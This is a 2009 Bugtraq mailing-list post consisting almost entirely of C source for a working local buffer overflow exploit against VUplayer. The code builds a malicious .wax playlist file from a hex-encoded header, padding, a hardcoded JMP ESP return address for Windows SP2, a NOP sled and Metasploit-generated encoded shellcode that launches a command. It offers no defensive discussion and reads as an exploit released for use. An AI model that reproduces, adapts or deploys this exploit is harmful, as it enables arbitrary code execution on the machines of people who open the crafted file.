[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200901232247.n0NMla6b013869@www5.securityfocus.com>
Date: Fri, 23 Jan 2009 15:47:36 -0700
From: storms0uth@...mail.com
To: bugtraq@...urityfocus.com
Subject: VUplayer (.wax file) local buffer overflow crash exploit
/* VUplayer (.wax file) local buffer overflow crash exploit
* By Assad edin - Moroccan Hackerz ( Mgharba Until Death ) - Storms0uth@...mail.com
* Mgharba Bhjawa Msalmine : xCracker - Assad edin - Simo-s0ft .
* Special Thanks: All Moroccan & Muslims Hackers & Str0ke Ro7 T9Awd CHof li I7wik.
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
// unicode format
char header1[]=
"\x3c\x77\x61\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22"
"\x33\x2e\x30\x22\x20\x3e\x0d\x0d\x0d\x3c\x65\x6e\x74\x72\x79\x3e"
"\x0d\x0d\x0d\x3c\x74\x69\x74\x6c\x65\x3e\x43\x6f\x64\x65\x64\x20"
"\x42\x79\x20\x53\x69\x6d\x4f\x2d\x73\x30\x66\x54\x2e\x6d\x70\x33"
"\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0d\x0d\x0d\x3c\x72\x65\x66\x20"
"\x68\x72\x65\x66\x20\x3d\x09";
//win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a";
char header2[]=
"\x2f\x3e\x0d\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x3c\x2f\x77\x61"
"\x78\x3e";
int main(int argc,char *argv[])
{ FILE *openfile;
char exploit[1290];
char junk[925];
char ret[]="\x68\xD5\x85\x7C";// JMP kernel32.dll esp (Windows Trust SP2)
char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
printf(" CoDEd By Ismail ==> marrakesh city");
memset(junk,0x41,925);
memcpy(exploit,junk,925);
memcpy(exploit+925,ret,strlen(ret));
memcpy(exploit+925+strlen(ret),nop,strlen(nop));
memcpy(exploit+925+strlen(ret)+strlen(nop),scode,343);
openfile=fopen("ismail.wax","wb");
if(openfile==NULL){ perror("ERROR....\n");}
fputs(header1,openfile);
fputs(exploit,openfile);
fputs(header2,openfile);
fclose(openfile);
printf("File created .....!"
"open it whit VUplayer..!");
return 0;
}
Powered by blists - more mailing lists